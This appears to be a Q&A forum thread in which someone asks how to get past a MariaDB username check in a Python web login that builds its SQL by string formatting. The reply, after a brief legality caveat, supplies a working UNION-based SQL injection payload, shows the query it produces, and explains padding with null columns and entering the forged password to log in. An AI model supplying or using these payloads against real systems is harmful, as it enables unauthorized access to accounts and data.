I just encountered a really simple but rather complicated SQL query which executes on validating the username in MariaDB. The statement has two escape charecters and I cant seem to get around that. I have been trying different payload but none of them seem to work. On a invalid statement it returns a traceback Call error informing about the error.
I have already tried 1' or '1'='1 and the 0 version of this
python
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
I wanted to find a way to bypass this validation statement and grant me access.
Please keep in mind such practice on websites you do not own/have the owner consent is illegal.
Try with and Union, the input:
' and 1=2 UNION SELECT 'anypass' --
would produce the following query if I understood your problem correctly:
SELECT password FROM admins WHERE username='' and 1=2 UNION SELECT 'anypass' --
Union operator requires the same number of columns, if you get an error of that type, try with the following:
' and 1=2 UNION SELECT 'anypass', null --
Add null columns until you no longer have an error.
Then you only have to put 'anypass' in the password field.